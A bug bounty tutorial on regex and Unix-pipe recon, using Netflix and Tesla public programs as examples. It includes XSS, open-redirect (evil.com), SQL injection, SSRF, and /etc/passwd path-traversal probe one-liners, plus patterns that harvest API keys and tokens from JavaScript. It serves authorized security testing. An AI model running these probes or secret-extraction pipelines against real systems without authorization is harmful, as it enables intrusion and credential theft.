TL;DR 😅: Most bug bounty hunters drown in tool output and miss real findings. This article shows how to use regex and Unix pipes to separate signal from noise, covering passive recon, XSS, SQLi, open redirects, SSRF, LFI, and secret hunting, with real one-liners targeting Netflix's and Tesla's public programs.

Introduction

There's a moment every bug bounty hunter knows. You've run subfinder, gau, katana, and waybackurls. Your terminal has scrolled past thousands of lines. You have a folder full of text files. And yet: nothing. No bugs. Just noise.

The hunters who consistently find vulnerabilities aren't necessarily running more tools. They're running smarter pipelines. They know how to take the raw, chaotic output of a dozen recon tools and distill it down to the twenty URLs that actually matter. The secret weapon behind that skill isn't a fancy paid tool or a zero-day exploit. It's regex and Unix pipes.

Regex (regular expressions) is the lens that lets you see patterns in text. Pipes are the glue that connects tools into automated workflows. Together, they turn your terminal into a vulnerability-finding machine. This article is a practical, no-fluff guide to mastering both in the context of bug bounty hunting.

We'll cover everything from a crash course in regex syntax to full recon pipelines, XSS hunting, secret extraction from JavaScript files, and a complete automated recon script. All examples use Netflix (bugcrowd.com/netflix) and Tesla (bugcrowd.com/tesla) as reference targets; both are public programs with broad scopes, making them ideal for demonstration. By the end of this article, you'll have a toolkit of one-liners and pipelines you can drop into your workflow immediately.

The Mindset: Think Like a Parser

Before we touch a single command, we need to talk about mindset. Every tool in your bug bounty arsenal (subfinder, gau, katana, nuclei, httpx) outputs text. That's it. Text to stdout. And text is just data. Data has patterns. Your job as a hunter is to find those patterns and extract meaning from them.

This is the Unix philosophy at its core: build small tools that do one thing well, and compose them with pipes. grep finds patterns. sed transforms text. awk processes fields. sort and uniq deduplicate. jq parses JSON. None of these tools knows anything about bug bounty hunting, but when you chain them together with the right regex, they become a vulnerability scanner.

Think of your recon pipeline as a series of filters. Raw input comes in on the left. Each stage narrows the data down further. By the time you reach the right side of the pipe, you have a small, high-signal list of targets worth investigating manually.

The hunters who miss bugs are the ones who stare at raw tool output and try to manually spot something interesting. The hunters who find bugs are the ones who write a regex that pulls out exactly the URLs with redirect= or file= parameters, and then test only those. Automation handles the boring filtering. You handle the interesting exploitation. Regex is not optional in this workflow. It is the difference between finding a bug and missing it.

Regex Crash Course for Bug Hunters (Practical, Not Academic)

You don't need to memorize every regex feature. You need to know the twenty percent that covers ninety percent of real-world use cases in bug bounty. Here's that twenty percent.

The Basics

• . matches any single character except newline. a.c matches abc, a1c, a-c.

• * means zero or more of the preceding element. ab*c matches ac, abc, abbc.

• + means one or more. ab+c matches abc and abbc, but not ac.

• ? means zero or one; it makes something optional. colou?r matches both color and colour.

In bug bounty, these basics show up constantly. Want to match any API key parameter regardless of spacing? api_key\s*=\s*\S+ uses \s* (zero or more whitespace) to handle both api_key=value and api_key = value.

Character Classes

[abc] matches any single character in the set.

[a-z] matches any lowercase letter.

[0-9] matches any digit.

[^abc] matches anything not in the set.

Example: extracting subdomains from crt.sh output where you only want valid hostname characters:

grep -oP '[a-zA-Z0-9._-]+\.netflix\.com'

Anchors

^ anchors to the start of a line. $ anchors to the end. These are critical for avoiding false positives. Quote the pattern so the shell does not strip the backslash before grep sees it.

# Only match lines that START with http
grep '^http'

# Only match lines that END with .js
grep '\.js$'

Shorthand Classes

• \d digit (same as [0-9] )

• \w word character (letters, digits, underscore)

• \s whitespace

• \D , \W , \S the negations (non-digit, non-word, non-whitespace)

These are PCRE features, so use grep -P or grep -oP to enable them.

Groups and Non-Capturing Groups

(group) captures a match for backreference or extraction. (?:non-capture) groups without capturing, which is useful for applying quantifiers without storing the match.

# Capture the value after api_key=
grep -oP 'api_key=\K[^\s&]+'

Case Insensitive: (?i)

grep -oP '(?i)(api_key|apikey|api-key)\s*[=:]\s*\S+'

This matches API_KEY, api_key, Api-Key: all the variations developers use.

\K — The Secret Weapon

\K is a PCRE feature that resets the start of the match. Everything before \K must still match, so it acts like a lookbehind condition, but it is not included in the output. This is cleaner than a full lookbehind assertion.

# Without \K you get the prefix too
grep -oP 'token=\S+'
# outputs: token=abc123

# With \K you get only the value
grep -oP 'token=\K\S+'
# outputs: abc123

In practice, \K is how you extract clean values from messy text without post-processing.
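To make the \K behaviour concrete, here is a minimal sketch that wraps it in a reusable helper. The function name extract_param and the sample URL are hypothetical, and the sketch assumes GNU grep built with PCRE support (-P).

```shell
# Hypothetical sample URL; only the requested parameter value should come out.
sample='https://example.com/cb?user=42&token=abc123&next=/home'

# extract_param NAME: print the value of query parameter NAME from stdin.
# Everything before \K must match but is dropped from the printed result.
extract_param() {
  grep -oP "[?&]$1=\\K[^&#\\s]+"
}

printf '%s\n' "$sample" | extract_param token   # prints: abc123
```

Anchoring on [?&] before the name keeps a parameter such as csrf_token from being mistaken for token.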

Lookahead and Lookbehind

• (?=…) positive lookahead: match if followed by pattern

• (?!…) negative lookahead: match if NOT followed by pattern

• (?<=…) positive lookbehind: match if preceded by pattern

• (?<!…) negative lookbehind: match if NOT preceded by pattern

# Extract URLs that have a 'token' parameter
# (the lookahead sits right after the scheme so the whole URL is still printed)
grep -oP 'https?://(?=\S*[?&]token=)\S+'

# Extract the value after 'secret=' but not if it's 'null'
# (the negative lookahead must come before the value, not after it)
grep -oP '(?<=secret=)(?!null\b)[^&\s]+'

Named Groups: (?P<name>…)

Named groups make complex extractions readable and are especially useful with Python or when building custom tooling.

# Python-style named group. grep -P accepts the syntax, but -o still prints the whole match, not just the group
grep -oP '(?P<subdomain>[a-zA-Z0-9-]+)\.tesla\.com'

Practical Extraction Patterns

Here are the regex patterns you'll use most in bug bounty:

# Extract all URLs from a page

grep -oP 'https?://[^\s"'"'"'<>]+'

# Extract all query parameters

grep -oP '[?&]\K[^=&]+'

# Extract JWT tokens

grep -oP 'eyJ[a-zA-Z0-9_-]+\.[a-zA-Z0-9_-]+\.[a-zA-Z0-9_-]+'

# Extract AWS access keys
grep -oP '(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}'

# Extract email addresses
grep -oP '[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}'

# Extract IP addresses
grep -oP '\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b'

Core Tools & What They Do

grep / grep -oP

The workhorse of text filtering. -o prints only the matching part (not the whole line). -P enables PCRE (Perl-Compatible Regular Expressions), unlocking \K , \d , lookaheads, etc.

Install: pre-installed on most Linux distros

grep -oP 'https?://[^\s"]+' file.txt

sed

Stream editor. Best for substitution and transformation.

# Remove everything after = (strip parameter values)
sed 's/=.*/=/'

# Remove wildcard prefix from crt.sh output
sed 's/\*\.//g'

awk

Field-based text processing. Splits lines by delimiter and lets you work with columns.

# Print first and third fields (space-delimited)

awk '{print $1, $3}'

# Print lines where field 2 equals 443

awk '$2 == 443'

cut

Simpler field extraction than awk.

# Extract the IP from "ip:port" format
cut -d':' -f1
# output: ip

sort -u

Sort and deduplicate in one step. Essential before feeding URLs into any tool to avoid redundant requests.

cat urls.txt | sort -u

uniq

Remove consecutive duplicate lines. Use after sort for deduplication, or with -c to count occurrences.

sort urls.txt | uniq -c | sort -rn | head -20

tr

Translate or delete characters. Useful for normalizing input.

# Convert commas to newlines

echo "a,b,c" | tr ',' '\n'

# Lowercase everything

cat file.txt | tr '[:upper:]' '[:lower:]'

jq

JSON parser for the command line. Critical for working with API responses.

# Install: apt install jq / brew install jq



curl -s "https://crt.sh/?q=%.netflix.com&output=json" | jq -r '.[].name_value'

curl

HTTP client. The -s flag silences progress output, -k skips TLS verification, and -L follows redirects.

curl -sk -o /dev/null -w '%{http_code}' https://target.com

anew (tomnomnom)

Appends only new lines to a file like tee but deduplicating. Safe to run pipelines multiple times without bloating output files.

# Install

go install github.com/tomnomnom/anew@latest

subfinder -d netflix.com | anew subs.txt

uro

URL deduplication tool that removes URLs with the same path and parameter structure, keeping only unique patterns.

# Install

pip3 install uro

cat urls.txt | uro

gf (tomnomnom)

Grep with named pattern files. Lets you run gf xss instead of remembering a long regex. You can also write your own gf pattern files.

# Install
go install github.com/tomnomnom/gf@latest

cat urls.txt | gf xss

Gxss and kxss

Pipeline tools for finding reflected XSS candidates. Gxss checks which parameters reflect input; kxss checks which characters are reflected unencoded.

go install github.com/KathanP19/Gxss@latest

go install github.com/tomnomnom/kxss@latest

katana (ProjectDiscovery)

Fast, modern web crawler with JavaScript rendering support.

go install github.com/projectdiscovery/katana/cmd/katana@latest

katana -u https://netflix.com -d 5 -f qurl

waybackurls / gau

Passive URL collection from the Wayback Machine and other sources.

go install github.com/tomnomnom/waybackurls@latest

go install github.com/lc/gau/v2/cmd/gau@latest

subfinder / amass

Subdomain enumeration via passive sources.

go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest

httpx

Fast HTTP probing: checks which hosts are alive and grabs status codes, titles, and tech stack.

#installation

go install github.com/projectdiscovery/httpx/cmd/httpx@latest

#basic usage

cat subs.txt | httpx -silent -status-code -title

nuclei

Template-based vulnerability scanner with thousands of community templates for common CVEs and misconfigurations. Templates are written in YAML, and you can add your own.

# installation
go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest

# how to use with a list of targets in a file
nuclei -l urls.txt -t ~/nuclei-templates/

ffuf

Fast web fuzzer for directories, parameters, and virtual hosts.

#installation

go install github.com/ffuf/ffuf/v2@latest

#basic usage

ffuf -u https://netflix.com/FUZZ -w wordlist.txt -mc 200

hakrawler

Simple, fast web crawler focused on link and form extraction.

# installation
go install github.com/hakluke/hakrawler@latest

# basic usage
echo https://netflix.com | hakrawler

Passive Recon One-Liners (with Regex)

Passive recon is where every engagement starts. You're collecting data without touching the target directly, using certificate transparency logs, the Wayback Machine, and URL aggregators. The goal is to build a comprehensive picture of the attack surface before you send a single request to the target.

Here's the passive recon toolkit, demonstrated against Netflix and Tesla.

# Subdomain enum via crt.sh (Netflix)

curl -s "https://crt.sh/?q=%.netflix.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | anew subs.txt

# Subdomain enum via crt.sh (Tesla)

curl -s "https://crt.sh/?q=%.tesla.com&output=json" | jq -r '.[].name_value' | grep -v '^\*' | sort -u

# Wayback URLs

waybackurls netflix.com | uro | anew wayback.txt

# GAU passive URLs — filter for interesting file extensions

gau --subs netflix.com | uro | grep -E '\.(php|asp|aspx|jsp|json|xml|env|bak|sql|log|conf|config|yaml|yml|ini|txt)$' | anew interesting.txt

# Extract all unique params from wayback (Tesla)

waybackurls tesla.com | grep '?' | sed 's/=.*/=/' | sort -u | anew params.txt

# Find juicy endpoints by keyword

gau netflix.com | grep -E '(api|admin|login|auth|token|key|secret|password|upload|file|debug|config|backup|internal)' | sort -u

# Cert transparency with clean hostname extraction (Tesla)

curl -s "https://crt.sh/?q=%.tesla.com&output=json" | jq -r '.[].name_value' | grep -oP '[a-zA-Z0-9._-]+\.tesla\.com' | sort -u

Let's break down what's happening in each pipeline. The crt.sh query returns JSON. jq -r '.[].name_value' extracts the domain name field from every certificate entry. sed 's/\*\.//g' strips wildcard prefixes, turning *.api.netflix.com into api.netflix.com. sort -u deduplicates. anew appends only new entries to the output file.

The GAU pipeline is particularly powerful. By filtering for specific file extensions, you're not just collecting URLs; you're immediately triaging them. A .env file in the Wayback Machine is a critical finding. A .bak file might contain source code. .sql files might contain database dumps. This single one-liner can surface critical vulnerabilities before you've touched the target.
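One caveat with the extension filter: a pattern anchored with $ skips URLs that carry a query string, such as backup.sql?download=1. The sketch below shows one way to tolerate that. The function name interesting_ext, the shortened extension list, and the sample URLs are illustrative assumptions.

```shell
# interesting_ext: keep URLs whose path ends in a sensitive extension,
# whether or not a query string or fragment follows it.
interesting_ext() {
  grep -iE '\.(env|bak|sql|log|conf|config|ya?ml|ini)([?#]|$)'
}

# Hypothetical sample input; only the first two lines should survive.
printf '%s\n' \
  'https://example.com/.env' \
  'https://example.com/backup.sql?download=1' \
  'https://example.com/app.js' \
  'https://example.com/environment/index.html' |
  interesting_ext
```

The ([?#]|$) group replaces the bare $ anchor, so the extension must be followed by a query, a fragment, or the end of the line.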

In the parameter extraction pipeline, sed 's/=.*/=/' strips parameter values, leaving you with clean parameter names like ?redirect= and ?file=. This is your input for vulnerability-specific testing later.
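Note that sed 's/=.*/=/' cuts at the first = and so keeps only the first parameter of each URL. As a complementary sketch, the helper below lists every parameter name and counts how often each appears. The name param_names and the sample URLs are hypothetical, and it uses portable grep -oE with cut rather than \K.

```shell
# param_names: print every query parameter name found on stdin, one per line.
param_names() {
  grep -oE '[?&][^=&#]+=' | cut -c2- | sed 's/=$//'
}

# Hypothetical sample input; the final stages count occurrences per name.
printf '%s\n' \
  'https://example.com/go?redirect=/home&lang=en' \
  'https://example.com/view?file=report.pdf&lang=de' |
  param_names | sort | uniq -c | sort -rn
```

Frequently seen names are usually framework noise; the rare ones are often the more interesting test targets.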

Active Recon Pipeline (Full Workflow)

Once passive recon is done, you move to active recon — actually touching the target. This is where you enumerate live hosts, crawl for URLs, and build the full URL corpus you'll use for vulnerability testing.

# Setup
export TARGET="netflix.com"
export OUT="./recon/$TARGET"
mkdir -p "$OUT"

# Step 1: Subdomain enum
subfinder -d $TARGET -silent | anew $OUT/subs.txt
curl -s "https://crt.sh/?q=%.$TARGET&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | anew $OUT/subs.txt

# Step 2: Probe live hosts
cat $OUT/subs.txt | httpx -silent -status-code -title -tech-detect | anew $OUT/live.txt

# Step 3: Crawl
katana -u "https://$TARGET" -d 5 -f qurl | uro | anew $OUT/urls.txt

# Step 4: Passive URLs
gau --subs $TARGET | uro | anew $OUT/urls.txt
waybackurls $TARGET | uro | anew $OUT/urls.txt

# Step 5: Filter by extension
cat $OUT/urls.txt | grep -E '\.(js|json|xml|env|bak|sql|log|conf|yaml|yml|ini|txt|php|asp|aspx|jsp)$' | anew $OUT/interesting.txt

The httpx step is critical and often skipped by beginners. Subfinder might return 500 subdomains, but only 80 of them are actually live. Running nuclei or katana against all 500 wastes time and generates noise. Probing first with httpx and working only from live.txt is a discipline that separates efficient hunters from slow ones.

The -tech-detect flag on httpx is a bonus: it identifies the technology stack (WordPress, React, Django, etc.), which immediately tells you what vulnerability classes to prioritize.

The URL collection step combines three sources: active crawling with katana, and passive collection from GAU and Wayback. Each source finds URLs the others miss. Katana finds URLs that only appear in JavaScript or behind authenticated flows. GAU and Wayback find historical URLs that may have been removed from the live site but still work.

uro is the unsung hero here. Without it, you might have 50,000 URLs that are really just 2,000 unique patterns with different parameter values. uro collapses ?id=1 , ?id=2 , ?id=3 into a single entry, dramatically reducing the work downstream tools need to do.
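To see why collapsing helps, here is a rough stand-in for the idea using only sed and sort. It is an approximation for illustration, not uro's actual algorithm (uro applies more rules than this), and the name collapse_params and the sample URLs are hypothetical.

```shell
# collapse_params: blank out every query value, then deduplicate, so URLs
# that differ only in parameter values become a single line.
collapse_params() {
  sed -E 's/=[^&#]*/=/g' | sort -u
}

# Hypothetical sample input: four URLs, two distinct patterns.
printf '%s\n' \
  'https://example.com/item?id=1&sort=asc' \
  'https://example.com/item?id=2&sort=desc' \
  'https://example.com/item?id=3&sort=asc' \
  'https://example.com/user?name=bob' |
  collapse_params
```

Four input lines shrink to two patterns, which is the same effect uro has on a real URL corpus at a much larger scale.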

XSS Hunting Pipeline

Cross-site scripting remains one of the most commonly reported vulnerabilities in bug bounty programs. The challenge isn't finding parameters; it's finding parameters that actually reflect input without encoding it. That's where the Gxss and kxss pipeline shines.

Full XSS pipeline

# Crawl endpoint URLs
katana -u "https://netflix.com" -d 5 -f qurl | uro | anew $OUT/urls.txt

# Check for reflected parameters and unencoded characters
cat $OUT/urls.txt | Gxss | kxss | grep -oP '^URL: \K\S+' | sed 's/=.*/=/' | sort -u > $OUT/xss_candidates.txt

# Manual test with curl
curl -sk "$(head -1 $OUT/xss_candidates.txt)xsstest%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E" | grep -oP '(?<=value=")[^"]*xsstest[^"]*'

# Grep reflected params
cat $OUT/urls.txt | grep '=' | while read -r url; do
  curl -sk "${url}FUZZ" | grep -q 'FUZZ' && echo "[REFLECTED] $url"
done

The pipeline works in stages. Gxss injects a canary string into each parameter and checks if it appears in the response. kxss then checks which special characters (<, >, ", ') are reflected unencoded; these are the characters you need for XSS. The grep -oP '^URL: \K\S+' extracts just the URL from kxss output, and sed 's/=.*/=/' strips the value so you have a clean injection point.

The manual curl test URL-encodes a basic XSS payload and checks if it appears in a value= attribute context, one of the most common reflection points. The (?<=value=") lookbehind anchors the match to that specific context.

The while read loop at the bottom is a simple but effective reflection checker. For each URL, it appends FUZZ to the end of the URL (that is, to the last parameter's value) and checks if FUZZ appears literally in the response. If it does, the parameter reflects input, which is a prerequisite for XSS.
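Appending FUZZ to the URL only exercises the last parameter. As a sketch of a slightly broader check, the helpers below rewrite every parameter value to a canary and test a response body for it. The names inject_canary and reflects and the canary string are hypothetical, and the response here is a local stand-in rather than a real fetch.

```shell
# inject_canary CANARY: replace every query value on stdin with CANARY.
# CANARY is assumed to be alphanumeric so it needs no escaping in sed.
inject_canary() {
  sed -E "s/=[^&#]*/=$1/g"
}

# reflects CANARY: succeed if the response body on stdin contains CANARY.
reflects() {
  grep -qF -- "$1"
}

canary='zq7xreflect'   # hypothetical marker, unlikely to occur naturally
printf '%s\n' 'https://example.com/search?q=shoes&page=2' | inject_canary "$canary"

# Offline stand-in for a fetched response body:
printf '<input name="q" value="%s">\n' "$canary" | reflects "$canary" && echo "[REFLECTED]"
```

In a live pipeline the second printf would be replaced by curl -sk on the rewritten URL; a unique canary avoids false hits on common words such as FUZZ.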

Open Redirect Hunting

Open redirects are valuable both as standalone findings and as stepping stones to more severe vulnerabilities like OAuth token theft. The key is finding parameters that control where the application redirects after an action.

# Extract redirect params
cat $OUT/urls.txt | gf redirect | sed 's/=.*/=/' | sort -u > $OUT/redirect.txt

# Test with curl, without following redirects
cat $OUT/redirect.txt | while read -r url; do
  result=$(curl -sk -o /dev/null -w '%{redirect_url}' "${url}https://evil.com")
  echo "$result" | grep -q 'evil.com' && echo "[OPEN REDIRECT] $url"
done

# One-liner version (match evil.com only on the redirect side of the arrow)
cat $OUT/redirect.txt | xargs -I{} curl -sk -o /dev/null -w '%{url_effective} -> %{redirect_url}\n' "{}https://evil.com" | grep -E -- '-> .*evil\.com'

The gf redirect pattern matches common redirect parameter names: redirect, redirect_uri, return, returnTo, next, url, goto, destination, and many more. The sed 's/=.*/=/' strips existing values so you can inject your own.

The curl -w '%{redirect_url}' flag is the key here: it prints the URL that the server redirected to, without following it. If that URL contains evil.com, you have an open redirect candidate. The -o /dev/null discards the response body since you only care about the redirect header.

The xargs -I{} one-liner is more compact and easy to parallelize with -P. Because curl is not following redirects here, %{url_effective} is simply the URL that was requested, while %{redirect_url} is the redirect target the server returned. Since the requested URL already contains evil.com, the final grep has to match only the part after the arrow.
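A plain substring match on evil.com also fires when the server redirects to its own login page with the payload still in the query string. The sketch below compares the host of the redirect target instead. The function names location_host and redirects_to are hypothetical, and the parsing assumes an absolute URL (protocol-relative targets such as //evil.com are not handled).

```shell
# location_host: print the host part of an absolute URL read from stdin,
# dropping scheme, path, query, fragment, userinfo and port, in that order.
location_host() {
  sed -E 's|^[a-zA-Z][a-zA-Z0-9+.-]*://||; s|[/?#].*$||; s|^.*@||; s|:[0-9]+$||'
}

# redirects_to LOCATION HOST: succeed only if LOCATION's host is HOST
# or a subdomain of HOST.
redirects_to() {
  host=$(printf '%s\n' "$1" | location_host)
  case "$host" in
    "$2" | *."$2") return 0 ;;
    *) return 1 ;;
  esac
}

redirects_to 'https://evil.com/x' evil.com && echo "[OPEN REDIRECT]"
redirects_to 'https://target.example/login?next=https://evil.com' evil.com ||
  echo "same-site redirect, ignore"
```

Feeding the value of %{redirect_url} into redirects_to turns the loop's grep into a host comparison and removes most same-site false positives.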

SQLi Hunting

SQL injection is rarer in modern applications but still appears regularly in bug bounty programs, especially in legacy endpoints, admin panels, and API parameters. The approach here is error-based detection — injecting a single quote and looking for database error messages in the response.

# Extract SQLi candidates
cat $OUT/urls.txt | gf sqli | sed 's/=.*/=/' | sort -u > $OUT/sqli.txt

# Quick error-based test
cat $OUT/sqli.txt | while read -r url; do
  curl -sk "${url}'" | grep -iE "(sql syntax|mysql_fetch|ORA-|pg::|sqlite_error|ODBC SQL)" && echo "[SQLI] $url"
done

# With nuclei
nuclei -l $OUT/sqli.txt -t ~/nuclei-templates/vulnerabilities/generic/sqli-error-based.yaml -o $OUT/sqli_findings.txt

The regex in the grep step covers error messages from the most common database engines: MySQL (sql syntax, mysql_fetch), Oracle (ORA-), PostgreSQL (pg::), and SQLite (sqlite_error), plus generic ODBC driver errors (ODBC SQL). The -i flag in grep (or (?i) inside a PCRE pattern) handles variations in how different frameworks format error messages.

The nuclei approach is complementary: it uses curated templates that test more injection patterns and error signatures than a simple quote injection. Running both gives you better coverage.
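The error-signature check can also be pulled into a small function that reports which engine the error points to, which helps when choosing follow-up payloads. This is a minimal sketch: the name db_error_engine is hypothetical, the signatures are the ones from the grep above, and the five-digit ORA- form is a tightening added here to cut false matches.

```shell
# db_error_engine: read a response body on stdin and print the database
# engine suggested by the first matching error signature, if any.
# Returns non-zero and prints nothing when no signature matches.
db_error_engine() {
  body=$(cat)
  if   printf '%s' "$body" | grep -qiE 'sql syntax|mysql_fetch'; then echo mysql
  elif printf '%s' "$body" | grep -qE 'ORA-[0-9]{5}'; then echo oracle
  elif printf '%s' "$body" | grep -qiE 'pg::'; then echo postgresql
  elif printf '%s' "$body" | grep -qiE 'sqlite_error'; then echo sqlite
  else return 1
  fi
}

# Offline stand-in for a response body containing a MySQL error:
printf 'You have an error in your SQL syntax near line 1\n' | db_error_engine
```

In the loop above, curl -sk "${url}%27" | db_error_engine would replace the grep and label each hit with the likely backend.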

One important note: URL-encode your payloads when injecting through curl. A raw single quote is easy to mangle with shell quoting, and some servers and proxies reject unencoded special characters. Use %27 instead of ' when in doubt.

Secret / API Key Hunting in JavaScript

JavaScript files are goldmines. Developers frequently hardcode API keys, tokens, and credentials in frontend JavaScript — sometimes intentionally (for client-side SDKs), sometimes accidentally (committing debug code). Either way, it's your job to find them.

# Extract all JS files (including versioned ones like app.js?v=3)
cat $OUT/urls.txt | grep -E '\.js(\?|$)' | sort -u > $OUT/jsfiles.txt

# Download and grep for secrets
cat $OUT/jsfiles.txt | while read -r url; do
  curl -sk "$url" | grep -oP '(?i)(api[_-]?key|apikey|api[_-]?secret|access[_-]?token|secret[_-]?key)\s*[=:]\s*["\x27][a-zA-Z0-9_\-]{20,}["\x27]'
done | sort -u > $OUT/secrets.txt

# AWS keys
cat $OUT/jsfiles.txt | xargs -I{} curl -sk {} | grep -oP '(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}'

# GitHub tokens
cat $OUT/jsfiles.txt | xargs -I{} curl -sk {} | grep -oP 'ghp_[a-zA-Z0-9]{36}|github_pat_[a-zA-Z0-9_]{82}'

# Private keys (the -- stops grep from reading the leading dashes as options)
cat $OUT/jsfiles.txt | xargs -I{} curl -sk {} | grep -oP -- '-----BEGIN [A-Z ]*PRIVATE KEY-----'

The general secrets regex uses (?i) for case-insensitivity and matches common naming patterns: api_key, apiKey, api-key, api_secret, access_token, secret_key. The {20,} quantifier requires at least 20 characters; this filters out placeholder values like YOUR_API_KEY_HERE while catching real secrets.

The AWS key regex is precise and based on the actual format Amazon uses. AWS access key IDs start with one of those specific prefixes (AKIA for long-term keys, ASIA for temporary session keys, etc.) followed by exactly 16 uppercase alphanumeric characters. This pattern has a very low false positive rate.
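A quick offline check of the key-ID shape, using the placeholder key ID that appears in AWS documentation. The function name aws_key_ids and the sample JavaScript lines are hypothetical, and the sketch covers only the two most common prefixes rather than the full list above.

```shell
# aws_key_ids: print strings shaped like AWS access key IDs found on stdin:
# a known prefix followed by exactly 16 uppercase letters or digits.
aws_key_ids() {
  grep -oE '(AKIA|ASIA)[A-Z0-9]{16}'
}

# AKIAIOSFODNN7EXAMPLE is the placeholder key ID used in AWS documentation.
printf '%s\n' \
  'var cfg = { accessKeyId: "AKIAIOSFODNN7EXAMPLE", region: "us-east-1" };' \
  'var note = "AKIA is a prefix, not a key";' |
  aws_key_ids   # prints: AKIAIOSFODNN7EXAMPLE
```

The second sample line contains the prefix but not the 16 trailing characters, so it is ignored.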

The xargs -I{} approach is more compact than a while read loop for simple cases, and it parallelizes easily. The -P5 flag (parallel execution with 5 workers) can speed this up considerably for large JS file lists:

cat $OUT/jsfiles.txt | xargs -P5 -I{} curl -sk {} | grep -oP 'AKIA[A-Z0-9]{16}'

SSRF Hunting

Server-Side Request Forgery lets you make the target server send requests on your behalf, potentially reaching internal services, cloud metadata endpoints, or other restricted resources. Finding SSRF requires identifying parameters that accept URLs or hostnames.

# Extract SSRF-prone params
cat $OUT/urls.txt | gf ssrf | sed 's/=.*/=/' | sort -u > $OUT/ssrf.txt

# Test with interactsh (replace with your interactsh URL)
INTERACT="your-id.oast.fun"

cat $OUT/ssrf.txt | while read -r url; do
  curl -sk "${url}https://$INTERACT" &
done
wait

# Then check interactsh for callbacks

The gf ssrf pattern matches parameters like url, uri, path, dest, destination, redirect, proxy, fetch, load, src, source, href, link, callback, host, endpoint, and similar names that suggest the server might fetch a URL. You can also define your own custom pattern.

The interactsh approach is the gold standard for SSRF detection. Instead of pointing at evil.com, which you don't control, you use an interactsh server that logs every incoming request. If the target server fetches your URL, you'll see the callback in the interactsh dashboard, even if the response to your original request gives no indication that a fetch occurred.

The & at the end of the curl command runs it in the background, allowing you to test many URLs in parallel. Call wait after the loop if you need all requests to complete before checking interactsh.
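When every request points at the same callback host, a hit tells you that something fetched it but not which URL triggered it. One possible sketch is to give each candidate its own numbered subdomain. The name tag_payloads is hypothetical, and this assumes the callback server records the full hostname requested, including extra labels in front of your ID.

```shell
# tag_payloads HOST: append a numbered callback URL to each candidate on
# stdin and print "index<TAB>test-url" so callbacks can be mapped back later.
tag_payloads() {
  awk -v host="$1" '{ printf "%d\t%shttps://p%d.%s/\n", NR, $0, NR, host }'
}

# Hypothetical candidates and callback host:
printf '%s\n' \
  'https://example.com/fetch?url=' \
  'https://example.com/proxy?dest=' |
  tag_payloads 'your-id.oast.fun'
```

Saving this output to a file and requesting the second column means a callback for p2.your-id.oast.fun points straight at line 2.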

LFI Hunting

Local File Inclusion vulnerabilities allow reading arbitrary files from the server's filesystem. They're most common in PHP applications but appear in other stacks too. The classic test is path traversal to /etc/passwd .

# Extract file/path params
cat $OUT/urls.txt | gf lfi | sed 's/=.*/=/' | sort -u > $OUT/lfi.txt

# Test traversal
cat $OUT/lfi.txt | while read -r url; do
  curl -sk "${url}../../../etc/passwd" | grep -q 'root:' && echo "[LFI] $url"
done

The gf lfi pattern matches parameters like file, path, page, include, template, view, doc, document, folder, root, pg, style, and similar names that suggest file path handling.

The grep -q 'root:' check looks for the characteristic first line of /etc/passwd: root:x:0:0:root:/root:/bin/bash. If that string appears in the response, you very likely have LFI and should confirm manually. The -q flag makes grep silent (no output) and just sets the exit code, which the && operator uses to conditionally print the finding.

For deeper testing, consider also trying Windows paths (..\..\windows\win.ini) and null byte injection (../../../etc/passwd%00) for older PHP versions.
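Matching the bare text root: can fire on ordinary pages that happen to mention root. A slightly stricter sketch checks for the passwd field layout instead. The function name looks_like_passwd is hypothetical, and the sample inputs are local stand-ins for response bodies.

```shell
# looks_like_passwd: succeed if stdin contains a passwd-style root entry
# (name, password field, UID 0, GID 0), not just the text "root:".
looks_like_passwd() {
  grep -qE '(^|[^a-zA-Z0-9_])root:[^:]*:0:0:'
}

printf 'root:x:0:0:root:/root:/bin/bash\n' | looks_like_passwd && echo "[LFI] likely"
printf '<p>Contact root: admin@example.com</p>\n' | looks_like_passwd || echo "no passwd entry"
```

Swapping this in for grep -q 'root:' in the loop keeps the same exit-code logic while dropping the most obvious false positives.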

Advanced jq + curl Tricks

JSON is everywhere in modern web applications: API responses, configuration endpoints, certificate transparency logs, search APIs. jq is your scalpel for extracting exactly what you need from JSON data.

# Parse Shodan for a target
shodan search 'hostname:netflix.com' --fields ip_str,port,org | awk '{print $1":"$2}' | anew $OUT/shodan.txt

# crt.sh with full JSON parsing: name, issuer, and issue date
curl -s "https://crt.sh/?q=%.tesla.com&output=json" | jq -r '.[] | [.name_value, .issuer_name, .not_before] | @tsv' | grep -v '^\*' | sort -u

# Extract emails from crt.sh (sometimes appears in cert subject)
curl -s "https://crt.sh/?q=%.netflix.com&output=json" | jq -r '.[].name_value' | grep -oP '[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}' | sort -u

# GitHub dorks via API (code search requires a token; GITHUB_TOKEN is assumed to hold yours)
curl -s -H "Accept: application/vnd.github.v3+json" -H "Authorization: Bearer $GITHUB_TOKEN" "https://api.github.com/search/code?q=netflix.com+api_key&per_page=10" | jq -r '.items[].html_url'

# Wayback CDX API (raw, high volume); .[1:] skips the header row
curl -s "http://web.archive.org/cdx/search/cdx?url=*.netflix.com/*&output=json&fl=original&collapse=urlkey&limit=10000" | jq -r '.[1:][] | .[0]' | uro | anew $OUT/wayback_cdx.txt

The @tsv filter in jq formats an array as tab-separated values, perfect for piping into awk or cut for further processing. The [.name_value, .issuer_name, .not_before] expression constructs an array from three fields before formatting.
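Once the data is tab-separated, awk can filter on any column. The sketch below keeps only names whose not_before date falls on or after a cutoff, working on rows shaped like the @tsv output above. The function name names_since and the sample rows are hypothetical.

```shell
# names_since DATE: from "name<TAB>issuer<TAB>not_before" rows on stdin,
# print names whose not_before sorts at or after DATE. ISO 8601 timestamps
# compare correctly as plain strings; the "" forces string comparison.
names_since() {
  awk -F '\t' -v since="$1" '($3 "") >= (since "") { print $1 }' | sort -u
}

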